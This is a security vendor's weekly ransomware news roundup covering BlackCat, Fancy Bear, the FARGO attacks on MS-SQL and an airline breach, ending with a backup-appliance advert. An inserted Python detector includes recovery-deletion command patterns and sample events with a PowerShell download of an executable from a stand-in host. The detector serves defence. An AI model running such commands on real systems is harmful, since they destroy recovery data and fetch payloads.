Weekly Ransomware Roundup Sep 26  - 30, 2022

Noberus Ransomware Gets Upgraded - Targets Veeam Backup software

Coreid – the ransomware-as-a-service (RaaS) group behind the Noberus ransomware, aka BlackCat or ALPHV, has upgraded its malware to steal data and credentials from compromised networks. Noberus now uses an extensively updated version of the ‘Exmatter’ data exfiltration tool and ‘Eamfo’, an info-stealing malware. The updated version allows Exmatter to target more files while avoiding detection, because the tool has been extensively rewritten. Eamfo uses SQL queries to steal credentials stored by Veeam backup software, allowing the attackers to gain access to critical systems. Read more

Stealthy Hackers Target Military and Weapons Contractors

Security researchers have discovered a new campaign targeting multiple military contractors involved in weapon manufacturing. The highly targeted attacks begin with a phishing email sent to employees, leading to a multi-stage infection that involves many persistence and detection-avoidance mechanisms. The threat actor uses a highly secured C2 infrastructure and multiple layers of obfuscation in the PowerShell stages. Analysts have not been able to attribute the campaign to any known threat actor, but have pointed out some similarities with the APT37 (Konni) group. Read more

American Airlines Breached Using Compromised MS Exchange Account

American Airlines was breached in a phishing campaign that used an employee's hacked Microsoft 365 account. The breach compromised personally identifiable information (PII) and medical information of both customers and employees. The attacker used the IMAP protocol to access mailboxes and sync their contents to another device. Once accessed, the hacker used these mailboxes to send phishing emails. The investigation revealed that the attacker further accessed multiple employees' accounts to send more phishing emails to targeted accounts. Read more

Hackers Use 'Mouseover' in PowerPoint files for Malware Deployment

The threat actor ‘Fancy Bear’ is targeting entities in the defense and government sectors of Europe using a new method that abuses the mouse-hover function in Microsoft PowerPoint documents to deploy malware. Once the mouse is hovered over the hyperlink contained in the file, the code runs a PowerShell script that downloads and executes a dropper from OneDrive. The dropper then downloads another payload, known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads. Read more

8 Things You Can Do to Protect Your Endpoints from Ransomware

Ransomware operators search for and exploit vulnerable endpoints in your enterprise network to exfiltrate your data and then encrypt it. That is why you need to plan and execute your ransomware protection strategy carefully. Here is a list of 8 things you can do to protect your critical endpoints from ransomware attacks. Read more

Microsoft SQL servers hacked in TargetCompany ransomware attacks

Vulnerable Microsoft SQL servers are being targeted in a new wave of attacks with FARGO ransomware, security researchers are warning. The ransomware infection starts with the MS-SQL process on the compromised machine downloading a .NET file using cmd.exe and powershell.exe. The payload fetches additional malware (including the locker), generates and runs a BAT file that terminates specific processes and services. Additionally, the malware executes the recovery deactivation command and terminates database-related processes to make their contents available for encryption. Read more
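The chain described above (the MS-SQL process spawning cmd.exe/powershell.exe to fetch a payload, then a recovery-deactivation command) gives defenders two cheap process-creation detections. The following is an added example, not code from the roundup or from any vendor; the event records are constructed Sysmon-style samples, and the specific recovery-deactivation commands it matches are illustrative assumptions, since the article does not name them.

```python
import re

# Child images a database engine should not spawn during normal operation.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Assumption: the roundup names no specific "recovery deactivation command";
# these are common patterns ransomware uses to disable Windows recovery.
RECOVERY_DISABLE_PATTERNS = [
    re.compile(r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I),
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
]

# Constructed sample events (parent image, child image, child command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/a.exe -OutFile a.exe"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": "sqlservr.exe -sMSSQLSERVER"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (index, reason) for each event matching either detection."""
    hits = []
    for i, ev in enumerate(events):
        parent, child = basename(ev["parent"]), basename(ev["image"])
        if parent == "sqlservr.exe" and child in SUSPICIOUS_CHILDREN:
            hits.append((i, f"MS-SQL spawned {child}"))
            continue
        if any(p.search(ev["cmdline"]) for p in RECOVERY_DISABLE_PATTERNS):
            hits.append((i, "recovery deactivation command"))
    return hits


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

The first rule is low-noise on most estates because sqlservr.exe rarely has a legitimate reason to launch a shell; xp_cmdshell usage by administrators is the main exception to tune for.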

210TB Fully Air-Gapped & Immutable Veeam Backup and DR appliance for $14,995

210TB Veeam Backup and DR appliance with Policy based Immutability using built-in Network & Power management Controllers and automated physical and logical Air-Gapped vault for $14,995.

Gen 10, 16-bay, 3U Rackmount unit with 15x14TB (210TB) Enterprise SAS drives, 10 core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For hardware details and demos, fill out the form on the StoneFly website.
